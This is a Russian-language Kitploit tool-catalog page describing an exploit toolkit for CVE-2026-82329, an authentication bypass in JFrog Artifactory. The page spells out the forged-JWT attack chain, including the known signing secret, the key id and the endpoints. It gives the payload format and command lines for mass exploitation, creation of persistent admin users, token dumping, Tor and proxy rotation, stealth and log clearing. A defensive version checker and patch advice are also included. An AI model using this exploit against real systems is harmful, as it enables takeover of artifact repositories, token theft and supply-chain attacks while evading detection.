Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-82329-PoC-Exploit — Эксплуатационный и детектирующий инструментарий для CVE-2026-82329 — обхода аутентификации в JFrog Artifactory. Подделывает join JWT для выпуска admin-токенов; включает неинтрузивную проверку версии. | Kitploit
Инструменты/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
Оборонительные ИнструментыСканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийСбор информацииВиртуализация для безопасностиТестирование на ПроникновениеАутентификация

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Red Teaming
GitHubtc4dy/cve-2026-82329-poc-exploit

CVE-2026-82329-PoC-Exploit

Эксплуатационный и детектирующий инструментарий для CVE-2026-82329 — обхода аутентификации в JFrog Artifactory. Подделывает join JWT для выпуска admin-токенов; включает неинтрузивную проверку версии.

Репозиторий
10 ч 35 мин назадЕщё не проверено
Поделиться

CVEPoC

CVE‑2026‑82329 – Набор инструментов для обхода аутентификации JFrog Artifactory

Python 3.8+ CVSS Author Artifactory

ТОЛЬКО ЭТИЧНОЕ ИСПОЛЬЗОВАНИЕ – АВТОРИЗОВАННОЕ ТЕСТИРОВАНИЕ БЕЗОПАСНОСТИ
Этот репозиторий предоставляет инструменты только для авторизованных специалистов по безопасности, blue teams и пентестеров.
Несанкционированный доступ к компьютерным системам является незаконным в соответствии с CFAA (США), Computer Misuse Act (Великобритания), TCK 243/244 (Турция) и аналогичными законами по всему миру.


📖 Обзор уязвимости

CVE‑2026‑82329 — критическая уязвимость обхода аутентификации в self-hosted JFrog Artifactory (версии 7.111.x – 7.161.x), позволяющая неаутентифицированному злоумышленнику получить полный токен администратора платформы, злоупотребляя механизмом присоединения к кластеру JFrog Access.

Как это работает

  1. Доверие к пустому ключу присоединения – JFrog Access доверяет фантомному ключу присоединения, значение которого является пустой строкой. Его секрет подписи, следовательно, является детерминированным значением 32 * 0x20 (пробелы).
  2. Поддельный join JWT – злоумышленник подделывает HS256 JWT, подписанный этим известным секретом, с kid = SHA256("").
  3. Выдача SERVICE-токена – POST /access/api/v1/registry/join возвращает SERVICE-токен с scp=admin без какой-либо аутентификации.
  4. Обмен на admin-токен – POST /access/api/v1/tokens с scope=applied-permissions/admin&audience=* выдаёт полный токен администратора платформы.
  5. Воздействие – полный захват репозитория, кража токенов, создание административных пользователей, отравление артефактов, атаки на цепочку поставок и боковое перемещение в подключённые сервисы (Xray, Mission Control, Distribution). Немедленно обновитесь!

Уязвимые версии

  • 7.111.4 – 7.111.20 – уязвима
  • 7.117.0 – 7.117.27 – уязвима
  • 7.125.0 – 7.125.19 – уязвима
  • 7.133.0 – 7.133.28 – уязвима
  • 7.146.0 – 7.146.36 – уязвима
  • 7.161.0 – 7.161.19 – уязвима

Патч

  • Обновитесь до 7.111.21, 7.117.28, 7.125.20, 7.133.29, 7.146.38 или 7.161.20 или новее.
  • Если обновление невозможно, ограничьте сетевой доступ к Artifactory (никогда не выставляйте его в интернет) и смените все admin-токены в качестве временного обходного решения.

🧰 Инструменты

ИнструментНазначениеЦелевой пользователь
exploit.pyПолный боевой набор с подделкой JWT, обменом на admin-токен, созданием административных пользователей, массовым сканированием, стелс-режимом, ротацией прокси, интерактивным меню и полной цепочкой атаки.Red teams / авторизованные пентестеры
safechecker.pyНеинтрузивный чекер уязвимости, который определяет версию Artifactory, проверяет экспозицию и оценивает риск без получения какого-либо токена или выполнения какой-либо полезной нагрузки. Генерирует JSON-отчёты.Blue teams / аудиторы безопасности

📊 Сравнение возможностей

Возможностьexploit.pysafechecker.py
Обнаружение уязвимости✅✅
Определение версии✅✅
Поддельный join JWT✅❌
Выпуск service-токена✅❌
Обмен на admin-токен✅❌
Создание административного пользователя✅❌
Список репозиториев✅❌
Список пользователей✅❌
Дамп конфигурации✅❌
Дамп токенов✅❌
Полная цепочка атаки✅❌
Интерактивное меню✅❌
Массовое сканирование (многопоточное)✅✅
Поддержка прокси✅✅
Ротация прокси✅❌
Поддержка Tor (анонимность)✅❌
Ротация User-Agent (OPSEC)✅❌
Джиттер (OPSEC)✅❌
Адаптивный ограничитель скорости✅❌
Неинтрузивный (безопасный) режим❌✅
Отчёт о версии✅✅
Проверка анонимного доступа❌✅
JSON-отчёт✅

🎯 Сводка по вариантам использования

СценарийРекомендуемый инструмент
Blue Team – проверка, уязвим ли ваш Artifactorysafechecker.py
Аудит безопасности – неинтрузивная оценка уязвимостиsafechecker.py
Red Team – авторизованное тестирование на проникновение с полной эксплуатациейexploit.py
Bug Bounty – ответственное раскрытиеsafechecker.py
Массовое сканирование – проверка нескольких целей на уязвимостьexploit.py (только обнаружение)
Реагирование на инциденты – проверка, скомпрометированы ли системыsafechecker.py

⚙️ Установка

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi

📋 Параметры

Параметры exploit.py

ПараметрОписание
-u, --urlURL одной цели Artifactory (например, http://artifactory.example.com:8082)
-f, --fileФайл со списком целей (по одной в строке) для массового сканирования
--create-adminСоздать постоянного административного пользователя (формат: USER:PASS)
--keep-adminСохранить созданного административного пользователя (не удалять после сканирования)
--token-onlyТолько вывести admin-токен (одна цель)
--interactiveИнтерактивное меню после эксплуатации
--service-idService ID для join JWT (по умолчанию: jfrt@01)
-t, --threadsКоличество потоков для нескольких целей (по умолчанию: 10)
--timeoutТаймаут запроса (по умолчанию: 25с)
--retryМаксимум повторных попыток (по умолчанию: 3)
--proxyHTTP/HTTPS прокси (например, http://127.0.0.1:8080)
--proxy-listФайл с прокси для ротации (по одному в строке)
--jitterСлучайный джиттер (0‑2 сек) между запросами
--stealthВключить стелс-режим (ротация UA + X-Forwarded-For)
--curl-cffiИспользовать curl_cffi для имперсонации TLS-отпечатка
--fullПолная атака: все модули
--dump-configДамп системной конфигурации
--dump-tokensДамп всех токенов доступа
--list-reposСписок репозиториев
--list-usersСписок пользователей

Параметры safechecker.py

ПараметрОписание
-u, --urlURL одной цели Artifactory (например, http://artifactory.example.com:8082)
-f, --fileФайл со списком целей (по одной в строке)
-t, --threadsКоличество потоков для нескольких целей (по умолчанию: 5)
--timeoutТаймаут запроса (по умолчанию: 10с)
-v, --verboseПодробный вывод
-o, --outputСохранить JSON-отчёт в файл

💥 Сценарии

#СценарийКоманда
1Быстрая проверка уязвимостиpython safechecker.py -u http://artifactory.example.com:8082
2Детальное сканирование с отчётомpython safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3Массовый аудит из файлаpython safechecker.py -f targets.txt -t 10 -o audit.json
4Эксплойт только для обнаруженияpython exploit.py -u http://artifactory.example.com:8082 --detect
5Получить только admin-токенpython exploit.py -u http://artifactory.example.com:8082 --token-only
6Полная атака с интерактивным менюpython exploit.py -u http://artifactory.example.com:8082 --interactive
7Создать постоянного административного пользователяpython exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8Дамп конфигурацииpython exploit.py -u http://artifactory.example.com:8082 --dump-config
9Список репозиториев и пользователейpython exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10Массовая эксплуатация со стелсомpython exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11Ротация прокси с Torpython exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth

🧪 Конечные точки и цепочка эксплуатации

Эксплойт использует следующие конечные точки JFrog и шаги эксплуатации:

ШагМетодКонечная точкаОписание
1. JoinPOST/access/api/v1/registry/joinПоддельный HS256 JWT → SERVICE-токен (scp=admin)
2. ExchangePOST/access/api/v1/tokensSERVICE-токен → токен администратора платформы
3. ProveGET/artifactory/api/system/configurationДоказательство доступа только для администратора
4. PersistPUT/artifactory/api/security/users/{user}Создать постоянного административного пользователя
5. RevokeDELETE/access/api/v1/tokens/{id}Очистка созданных токенов

Формат полезной нагрузки

root@kitploit:~
# Forged join JWT structure
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iat": <unix_timestamp>,
  "service_id": "jfrt@01",
  "kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  "skip_node_registration": true
}

# Signing secret
secret = b"\x20" * 32

# Admin token request
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false

🛡️ Ответственное использование

  • Используйте эти инструменты только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.
  • Несанкционированный доступ является незаконным и неэтичным.
  • Авторы не несут ответственности за любое неправомерное использование.
  • Всегда соблюдайте законы и нормативные акты вашей страны.

Это программное обеспечение предоставляется исключительно в образовательных целях и для авторизованного тестирования безопасности.

Скачать инструмент
✅
Очистка логов (антифорензика)✅❌
Пользовательский User-Agent✅✅
Управление проверкой SSL✅✅
--detect
Только обнаружение (без обмена на admin-токен)
--exploitВыполнить полную эксплуатацию
-o, --outputСохранить JSON-отчёт в файл
-v, --verboseПодробный вывод
-q, --quietТихий режим